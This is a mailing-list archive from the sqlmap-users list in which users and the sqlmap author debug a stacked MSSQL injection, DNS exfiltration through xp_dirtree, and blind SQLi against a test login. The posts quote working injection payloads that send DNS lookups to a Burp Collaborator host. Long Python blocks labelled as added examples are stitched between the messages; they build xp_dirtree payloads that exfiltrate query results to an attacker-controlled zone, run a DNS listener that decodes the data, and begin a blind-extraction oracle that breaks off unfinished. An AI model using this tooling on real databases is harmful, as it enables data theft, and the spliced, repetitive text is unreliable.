My last message for today. You've said "However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests" <- you should really focus on why stacked SQLi hasn't worked in the first place. After you fix that one, you can try to use dns-exfil to speed up the data retrieval of the otherwise slow stacked SQLi.

Bye

On Tue, Dec 20, 2016 at 12:04 AM, Miroslav Stampar <mir...@gm...> wrote:

> As said, there should be at least one other SQLi technique available. In your case there is NONE. sqlmap will not blindly use dns-exfil if at least one other technique worked.
>
> Bye
>
> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:
>
>> Thanks, that's good advice. And I probably should post a little more detail on what I'm running here so others can see it as well.
>>
>> Here's the command executing:
>>
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
>>
>> [...]
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
|
From: Miroslav S. <mir...@gm...> - 2016-12-19 23:04:42
|
As said, there should be at least one other SQLi technique available. In your case there is NONE. sqlmap will not blindly use dns-exfil if at least one other technique worked.

Bye

On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:

> Thanks, that's good advice. And I probably should post a little more detail on what I'm running here so others can see it as well.
>
> Here's the command executing:
>
> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
>
> [...]
>
> And then, my capture results for DNS traffic:
>
> root@bass:~# tcpdump -n -i eth0 udp port 53
>
> [...]
>
> It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur... or else I'm doing something else wrong.
>
> Thanks,
>
> V
>
> ------------------------------
> *From:* Miroslav Stampar <mir...@gm...>
> *Sent:* Monday, December 19, 2016 4:10 PM
> *To:* Mark M.
> *Cc:* sql...@li...
> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>
> I would suggest you run Wireshark or similar when running with --dns-domain to properly debug what is going on. There could be really lots of problems before you fine tune it (e.g. another service running on :53).
>
> About "forcing" sqlmap to use dns-exfil: it will always at least try to test it at the start of a run (if another injection technique is available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available.
>
> As said, the best advice I can give you is to run Wireshark during the run and really see what is going on.
>
> Bye
>
> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:
>
>> I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:
>>
>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>
>> To make that a little easier to read, the injected value is:
>>
>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>>
>> I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page. The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all. I've provided the OS/DBMS and --level 5, but still no dice. I'm using sqlmap v1.0.12#stable.
>>
>> Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.). However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?
>>
>> Thanks
>>
>> V
>>
>> ------------------------------------------------------------------------------
>> Developer Access Program for Intel Xeon Phi Processors
>> Access to Intel Xeon Phi processor-based developer platforms.
>> With one year of Intel Parallel Studio XE.
>> Training and support from Colfax.
>> Order your platform today. http://sdm.link/intel
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
|
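The tcpdump capture posted in this thread only shows the scanning host's own lookups of www.testsite.org against 8.8.8.8; no query for the --dns-domain zone ever arrives, so the capture cannot tell "sqlmap never sent a payload that fires xp_dirtree" apart from "it fired, but the lookup never reached this box". The quickest way to separate the two is to exercise the channel by hand, outside sqlmap. The script below is an added example written for this page, not sqlmap code and not something posted by anyone in the thread: it builds the same kind of xp_dirtree stacked payload as the Burp one quoted above (hex-encoding the value and carrying 31 bytes per query so the result stays inside the 63-character DNS label limit), parses the raw query a resolver sends, and decodes the bytes. The zone dns.example.com, the CONVERT(..., 2) hex conversion (SQL Server 2008 and later) and the varchar(1024) buffer are assumptions; the listener needs the zone's NS record delegated to the host it runs on, and root (or CAP_NET_BIND_SERVICE) for UDP/53.

```python
"""Hand-check of an xp_dirtree DNS exfiltration channel, independent of sqlmap.

Added example for this page; not sqlmap code and not posted in the thread.
Assumed: an attacker-controlled zone (dns.example.com here) whose NS record
points at the host running serve(), and SQL Server 2008+ for CONVERT(..., 2).
"""
import socket
import struct

MAX_LABEL = 63                     # RFC 1035: one label is at most 63 octets
BYTES_PER_LABEL = MAX_LABEL // 2   # hex doubles the size, so 31 raw bytes fit


def xp_dirtree_payload(expr, domain, offset=1, length=BYTES_PER_LABEL):
    """Stacked T-SQL that makes the server resolve <hex(chunk)>.<domain>.

    Meant to follow a single-quoted string value, like the thread's
    ProductCategory=45'; ... payload. Only `length` bytes of the value are
    carried, starting at 1-based byte `offset` (hex position 2*offset-1).
    """
    hex_expr = (
        "SUBSTRING(CONVERT(varchar(8000),CAST(CAST((%s) AS varchar(8000)) "
        "AS varbinary(8000)),2),%d,%d)" % (expr, 2 * (offset - 1) + 1, 2 * length)
    )
    return ("';declare @q varchar(1024);set @q='\\\\'+%s+'.%s\\x';"
            "exec master.dbo.xp_dirtree @q;--" % (hex_expr, domain))


def payloads_for(expr, domain, max_bytes=124):
    """One payload per 31-byte chunk; send them in turn and reassemble."""
    return [xp_dirtree_payload(expr, domain, offset=o)
            for o in range(1, max_bytes + 1, BYTES_PER_LABEL)]


def build_query(qname, qid=0x1234):
    """Constructed DNS A query, the shape a resolver emits for a UNC path."""
    header = struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    labels = qname.rstrip(".").split(".")
    question = b"".join(bytes([len(l)]) + l.encode() for l in labels)
    return header + question + b"\x00" + struct.pack(">HH", 1, 1)


def parse_qname(packet):
    """Question name from a raw DNS query, or None if it is malformed."""
    if len(packet) < 17:               # 12-byte header, root name, QTYPE, QCLASS
        return None
    labels, pos = [], 12
    while True:
        if pos >= len(packet):
            return None
        n = packet[pos]
        pos += 1
        if n == 0:
            break
        # 0xC0 marks a compression pointer, never valid in a question name;
        # the same check rejects label lengths above 63
        if n & 0xC0 or pos + n > len(packet):
            return None
        labels.append(packet[pos:pos + n].decode("ascii", "replace"))
        pos += n
    return ".".join(labels) if labels else None


def decode_exfil(qname, domain):
    """Bytes carried in the labels in front of our zone; None if not ours."""
    suffix = "." + domain.lower().rstrip(".")
    name = qname.lower().rstrip(".")
    if not name.endswith(suffix):
        return None
    try:
        return bytes.fromhex(name[:-len(suffix)].replace(".", ""))
    except ValueError:                 # not hex: a stray lookup, not a chunk
        return None


def serve(domain, port=53):
    """Answer as the zone's name server and print every decoded chunk.

    Needs port 53 free and bindable, which is the ':53 already in use'
    pitfall mentioned in the thread.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", port))
    while True:
        pkt, peer = sock.recvfrom(512)
        qname = parse_qname(pkt)
        if qname is None:
            continue
        print("%s asked %s -> %r" % (peer[0], qname, decode_exfil(qname, domain)))
        # NOERROR with an empty answer section: the question is echoed back
        sock.sendto(pkt[:2] + b"\x81\x80" + pkt[4:6] + b"\x00" * 6 + pkt[12:], peer)


if __name__ == "__main__":
    zone = "dns.example.com"                      # assumed attacker zone
    for p in payloads_for("@@version", zone, max_bytes=62):
        print(p)
    # Constructed round trip: what the target's resolver would send us
    chunk = b"Microsoft SQL Server 2014 - 12."   # 31 bytes, one label
    pkt = build_query(chunk.hex() + "." + zone)
    print(decode_exfil(parse_qname(pkt), zone))  # b'Microsoft SQL Server 2014 - 12.'
```

Run serve() on the delegated host, then send the first payload through the injection point by hand (Burp Repeater is fine). If the decoded chunk appears, the channel works and the remaining question is purely sqlmap's detection; if nothing arrives even though Burp Collaborator did get a hit, look at delegation, a firewall in front of :53, or another resolver already bound there before blaming the tool.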
From: Mark M. <vv...@ho...> - 2016-12-19 23:02:06
|
Thanks, that's good advice. And I probably should post a little more detail on what I'm running here so others can see it as well.

Here's the command executing:

root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.0.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:56:14

[16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
[16:56:14] [INFO] setting up DNS server instance
custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
[16:56:16] [INFO] testing connection to the target URL
[16:56:18] [INFO] testing if the target URL is stable
[16:56:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 'ProductCategory' might not be injectable
[16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
[16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[16:56:39] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be injectable
[16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[16:58:03] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 98 times

[*] shutting down at 16:58:03

And then, my capture results for DNS traffic:

root@bass:~# tcpdump -n -i eth0 udp port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)
16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)
16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org. (30)
16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org. (30)
16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 173.213.231.200 (46)
16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org. (30)
16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? www.testsite.org. (30)
16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 173.213.231.200 (46)
16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org. (30)
16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? www.testsite.org. (30)
16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 (46)
16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org. (30)
16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? www.testsite.org. (30)
16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46)
16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)

It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur... or else I'm doing something else wrong.

Thanks,

V

________________________________
From: Miroslav Stampar <mir...@gm...>
Sent: Monday, December 19, 2016 4:10 PM
To: Mark M.
Cc: sql...@li...
Subject: Re: [sqlmap-users] Sqlmap/DNS exfil

I would suggest you run Wireshark or similar when running with --dns-domain to properly debug what is going on. There could be really lots of problems before you fine tune it (e.g.
other service running on :53). About the "forcing" sqlmap for using dns-exfil. It will always at least try to test it at the start of a run (if other injection technique available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available. As said, the best advice I can give to you is to run the wireshark during the run and really see what is going on. Bye On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...<mailto:vv...@ho...>> wrote: I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app: GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net<http://orator.net>\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1 To make that a little easier to read, the injected value is: ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net<http://orator.net>\rtf'; exec master.dbo.xp_dirtree @q;-- I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page. The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all. I've provided the OS/DBMS and --level 5, but still no dice. I'm using sqlmap v1.0.12#stable. Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.) However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests. 
Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding? Thanks V ------------------------------------------------------------------------------ Developer Access Program for Intel Xeon Phi Processors Access to Intel Xeon Phi processor-based developer platforms. With one year of Intel Parallel Studio XE. Training and support from Colfax. Order your platform today.http://sdm.link/intel _______________________________________________ sqlmap-users mailing list sql...@li...<mailto:sql...@li...> https://lists.sourceforge.net/lists/listinfo/sqlmap-users -- Miroslav Stampar http://about.me/stamparm |
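The capture in the message above already answers the question: every packet on udp/53 is sqlmap's own resolver asking 8.8.8.8 for www.testsite.org, and nothing at all arrives for dns.lanternsec.com, so no xp_dirtree lookup from the target ever reached this host. sqlmap's "setting up DNS server instance" line only matters if this box is the authoritative name server for the --dns-domain and the target's resolver can reach it on udp/53; the filter used here would have shown such queries. The Python below is an added example for this thread, not sqlmap's code and not the poster's: it builds xp_dirtree stacked-query payloads whose UNC host stays within the DNS label (63) and name (253) limits, which the thread's varchar(99) would otherwise truncate silently, then reads the queried names back out of tcpdump -n output and reassembles the data. The hex-in-labels layout with a leading s<n> sequence label, the varchar(8000) size, THREAD_CAPTURE (four lines copied from the capture above) and fake_capture (constructed lines using TEST-NET addresses) are this example's own choices, not sqlmap's --dns-domain encoding.

```python
import re
from typing import Dict, Iterable, List

# DNS limits (RFC 1035): 63 octets per label, 253 characters for a whole name in
# presentation form. A UNC host that exceeds them never produces a query.
MAX_LABEL = 63
MAX_NAME = 253

# Lines copied from the tcpdump capture posted in the thread: sqlmap's own
# resolver looking up the target host via 8.8.8.8, nothing under the exfil domain.
THREAD_CAPTURE = [
    "16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org. (30)",
    "16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org. (30)",
    "16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)",
    "16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)",
]

# Matches the query side of a `tcpdump -n` DNS line: "<id>+ A? name. (len)".
QUERY_RE = re.compile(r"\b(?:A|AAAA)\?\s+(\S+?)\.?\s+\(\d+\)")


def build_xp_dirtree_payloads(data: bytes, domain: str) -> List[str]:
    """Hex-encode `data` and pack it into as many stacked-query payloads as DNS
    limits require. Each UNC host is "s<n>.<hex labels>.<domain>"; the s<n>
    label (this example's own scheme) lets the listener reorder queries that
    arrive out of order. varchar(8000) is used on purpose: the thread's
    varchar(99) silently truncates any host longer than 99 characters."""
    hexdata = data.hex()
    payloads: List[str] = []
    pos = seq = 0
    while pos < len(hexdata):
        labels = [f"s{seq}"]
        budget = MAX_NAME - len(domain) - len(labels[0]) - 1  # room for "label." pieces
        if budget < 2:
            raise ValueError("domain leaves no room for data labels")
        while pos < len(hexdata) and budget > 1:
            take = min(MAX_LABEL, budget - 1, len(hexdata) - pos)
            labels.append(hexdata[pos:pos + take])
            pos += take
            budget -= take + 1
        host = ".".join(labels + [domain])
        assert len(host) <= MAX_NAME
        payloads.append(
            f"';declare @q varchar(8000);set @q='\\\\{host}\\x';"
            "exec master.dbo.xp_dirtree @q;--"
        )
        seq += 1
    return payloads


def unc_host(payload: str) -> str:
    """Pull the host part out of the \\\\host\\share UNC path in a payload."""
    m = re.search(r"\\\\([^\\']+)\\", payload)
    if not m:
        raise ValueError("no UNC path in payload")
    return m.group(1)


def parse_tcpdump_queries(lines: Iterable[str]) -> List[str]:
    """Return the names queried in the capture, in order, lower-cased.
    Response lines (no 'A?' marker) are skipped."""
    return [m.group(1).lower() for m in map(QUERY_RE.search, lines) if m]


def recover_exfil(names: Iterable[str], domain: str) -> bytes:
    """Reassemble data from queries under `domain`; names that are not ours
    (other domains, or the NS lookup for the domain itself) are ignored."""
    suffix = "." + domain.lower()
    chunks: Dict[int, str] = {}
    for name in names:
        if not name.endswith(suffix):
            continue
        labels = name[: -len(suffix)].split(".")
        if not (labels[0][:1] == "s" and labels[0][1:].isdigit()):
            continue
        chunks[int(labels[0][1:])] = "".join(labels[1:])
    hexdata = "".join(chunks[k] for k in sorted(chunks))
    return bytes.fromhex(hexdata)  # ValueError here means a chunk was lost


def fake_capture(payloads: Iterable[str]) -> List[str]:
    """Constructed tcpdump-style lines showing what a successful round trip
    would look like (TEST-NET addresses; the thread's capture has no such line)."""
    return [
        f"16:57:10.{i:06d} IP 203.0.113.10.5{i:04d} > 198.51.100.5.53: "
        f"{1000 + i}+ A? {unc_host(p)}. (300)"
        for i, p in enumerate(payloads)
    ]
```

To use it against a real run, feed the output of tcpdump -n -i eth0 udp port 53 to parse_tcpdump_queries and pass the names to recover_exfil with the --dns-domain value; an empty result, as with THREAD_CAPTURE, means the target never resolved anything under that domain and the problem is upstream of sqlmap's encoding.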
From: Miroslav S. <mir...@gm...> - 2016-12-19 22:11:00
I would suggest you run Wireshark or similar when running with --dns-domain to properly debug what is going on. There could be a lot of problems before you fine tune it (e.g. another service running on :53).

About "forcing" sqlmap to use dns-exfil: it will always at least try to test it at the start of a run (if another injection technique is available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available.

As said, the best advice I can give you is to run Wireshark during the run and really see what is going on.

Bye

On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:
> I have a situation where Burp has detected the following DNS exfiltration
> injection for a query parameter in a web app:
>
> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>
> To make that a little easier to read, the injected value is:
>
> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--
>
> I've modified the domain and verified that I receive the DNS requests on
> my local DNS server (the domain which I provide to sqlmap using the
> --dns-domain=xxx option) when the injection is manually sent to the page.
> The problem is, when I pass the request to sqlmap it's not detecting that
> there's an injection at all. I've provided the OS/DBMS and --level 5, but
> still no dice. I'm using sqlmap v1.0.12#stable.
>
> Since I've gotten many other injections to work in the past, I believe
> that I'm using sqlmap properly (formatting my request in a file
> appropriately, specifying the correct parameter to test, etc.) However, it
> surprised me that what appeared to be a fairly straightforward stacked SQL
> injection would slip by all of sqlmap's tests. Is there a way to force
> sqlmap to try DNS exfiltration injections despite no other injection
> technique succeeding?
>
> Thanks
>
> V

--
Miroslav Stampar
http://about.me/stamparm
From: Mark M. <vv...@ho...> - 2016-12-19 22:03:51
I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:

GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1

To make that a little easier to read, the injected value is:

';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;--

I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page. The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all. I've provided the OS/DBMS and --level 5, but still no dice. I'm using sqlmap v1.0.12#stable.

Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.) However, it surprised me that what appeared to be a fairly straightforward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?

Thanks
V
From: Daniele B. <bbi...@gm...> - 2016-12-04 17:00:20
I found something: the problem is sqlmap doesn't know when the query is true or false. Because when it is true it's redirected to index.php, when it is false Login.php shows an error message.
Is there a way to say "IF (you get redirected to index.php) THEN query is true ELSE query is false" or "IF (Login.php shows an error) THEN query is false ELSE query is true"?
I tried with the --not-string option but it doesn't seem to work.

2016-12-04 17:10 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
> anyway...could anyone take the source and try it himself?
>
> If it can help I'm using PHP v7.0 with php-mysql libraries
>
> 2016-12-04 17:00 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>> @Miroslav Ah ok...I don't know, I tried everything...
>>
>> 2016-12-04 16:57 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>>> UA == User-Agent
>>>
>>> On Dec 4, 2016 16:57, "Daniele Bianchin" <bbi...@gm...> wrote:
>>>> @Miroslav. What does UA mean?
>>>>
>>>> @Brandon tried with sqlmap -u "127.0.0.1/test/Login.php" --data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus and it didn't work.
>>>>
>>>> 2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>>>>> I am kind of confused. You said that it's your application, right? Why would your application care about UA? Also, you've sent source code which doesn't look at the UA.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>>>>>> Ok, I made a test with BurpSuite as Brandon said.
>>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>>>>> The same payload with sqlmap did not.
>>>>>>
>>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>>
>>>>>> the first is made manually with Firefox, the second with sqlmap...
>>>>>> should I change the user-agent in sqlmap?
>>>>>>
>>>>>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>>>>>> Ok, I made a test with BurpSuite as Brandon said.
>>>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>>>>>> The same payload with sqlmap did not.
>>>>>>>
>>>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>>>
>>>>>>> the first is made manually with Firefox, the second with sqlmap...
>>>>>>> should I change the user-agent in sqlmap?
>>>>>>>
>>>>>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>>>>>>> You can add --proxy and make sqlmap pass all requests through Burp Suite or another proxy so you can see what the difference is between the requests sqlmap creates and the ones you make by hand.
>>>>>>>>
>>>>>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>>>
>>>>>>>> This is a straightforward case. You are messing something up.
>>>>>>>>
>>>>>>>> Use username=foobar&password=foobar in POST data. Don't put an SQLi payload anywhere in advance. Use --level=3 --risk=3
>>>>>>>>
>>>>>>>> As said, you are doing something really really wrong here.
>>>>>>>>
>>>>>>>> Bye
>>>>>>>>
>>>>>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...> wrote:
>>>>>>>>> Hi!
>>>>>>>>> I have an issue with sqlmap.
>>>>>>>>> I created my own fake login in order to test blind SQL injection but every time I make a test sqlmap says it isn't exploitable.
>>>>>>>>> I tried to add a suffix, set level to 5, set risk to 3, set the not-string option but sqlmap still does not work with it.
>>>>>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>>>>>
>>>>>>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
>>>>>>>>> What should I do?
>>>>>>>>>
>>>>>>>>> Thanks in advance!
>>>>>>>>>
>>>>>>>>> Daniele.
>>>>>>>>>
>>>>>>>>> ------------------------------------------------------------------------------
>>>>>>>>> Check out the vibrant tech community on one of the world's most
>>>>>>>>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>>>>>>>>> _______________________________________________
>>>>>>>>> sqlmap-users mailing list
>>>>>>>>> sql...@li...
>>>>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>>>
>>>>>>>> --
>>>>>>>> Miroslav Stampar
>>>>>>>> http://about.me/stamparm
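What the message above asks for is a true/false oracle keyed on the response rather than on page content. sqlmap's default comparison looks at the response body; when the true branch is a 302 to index.php and the false branch is the Login.php error, it has to be told what to compare on: --code=302 makes the HTTP status code the signal, and --string / --not-string work on text that appears in only one of the two pages (answer "n" when sqlmap asks whether to follow the redirect, so the 302 stays visible to the comparison). The block below is an added example for this thread, not the poster's Login.php from the pastebin and not sqlmap code: FakeLoginPage is a constructed stand-in (SQLite in memory, one row admin/s3cret, a string-concatenated query, 302 on a matching row, 200 on none, 500 on a broken query), query_is_true is exactly the oracle the message describes, and extract uses it to pull a string out of the database one character at a time by binary search. Because SQLite stands in for MySQL, the comment is "-- " rather than "#" and unicode()/substr() replace ASCII()/SUBSTRING().

```python
import sqlite3
from typing import Optional, Tuple

Response = Tuple[int, Optional[str]]  # (HTTP status, Location header)


class FakeLoginPage:
    """Constructed stand-in for the poster's Login.php (not the pastebin source):
    the query is built by string concatenation, a matching row answers with a
    302 to index.php, no row answers 200 with the error message, and a broken
    query answers 500. SQLite stands in for MySQL."""

    def __init__(self) -> None:
        self.db = sqlite3.connect(":memory:")
        self.db.execute("CREATE TABLE users (user TEXT, password TEXT)")
        self.db.execute("INSERT INTO users VALUES ('admin', 's3cret')")
        self.requests = 0  # lets the caller see what blind extraction costs

    def post(self, user: str, password: str) -> Response:
        self.requests += 1
        sql = f"SELECT * FROM users WHERE user='{user}' AND password='{password}'"
        try:
            row = self.db.execute(sql).fetchone()
        except sqlite3.Error:
            return 500, None
        return (302, "index.php") if row else (200, None)


def query_is_true(resp: Response) -> bool:
    """The oracle asked for in the thread: a redirect means the injected
    condition held. This is the comparison sqlmap's --code=302 performs."""
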